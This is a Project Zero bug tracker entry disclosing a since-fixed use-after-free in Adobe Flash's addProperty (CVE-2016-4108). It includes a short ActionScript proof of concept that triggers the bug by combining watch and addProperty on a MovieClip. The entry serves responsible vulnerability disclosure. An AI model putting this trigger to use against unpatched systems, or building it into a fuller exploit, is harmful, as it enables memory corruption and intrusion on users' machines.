801 - Adobe Flash: Use-after-free in addProperty - project-zero

Starred by 3 users

Status:	Fixed
Owner:	natashenka@google.com
Closed:	May 2016
Cc:	project-...@google.com
Finder-natashenka Deadline-90 CCProjectZeroMembers Product-Flash Severity-High Vendor-Adobe Reported-2016-Apr-12 CVE-2016-4108

Adobe Flash: Use-after-free in addProperty

Project Member Reported by natashenka@google.com, Apr 13 2016

Back to list

There is a use-after-free in addProperty. If a property is added to a MovieClip object that already has a watch defined, and the watch deleted the MovieClip, it is used after it is freed.

A minimal PoC follows:

var t = this.createEmptyMovieClip( "t", 1);
t.watch("a", func);
t.addProperty("a", func, func);

function func(){
	
	trace("a");
	
	}

A sample fla and swf are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

frfree.fla
5.5 KB Download

frfree.swf
966 bytes Download

Project Member Comment 1 by natashenka@google.com, Apr 20 2016

frfree.swf
800 bytes Download

Project Member Comment 2 by natashenka@google.com, May 16 2016

Labels: -Restrict-View-Commit CVE-2016-4108
Status: Fixed

► Sign in to add a comment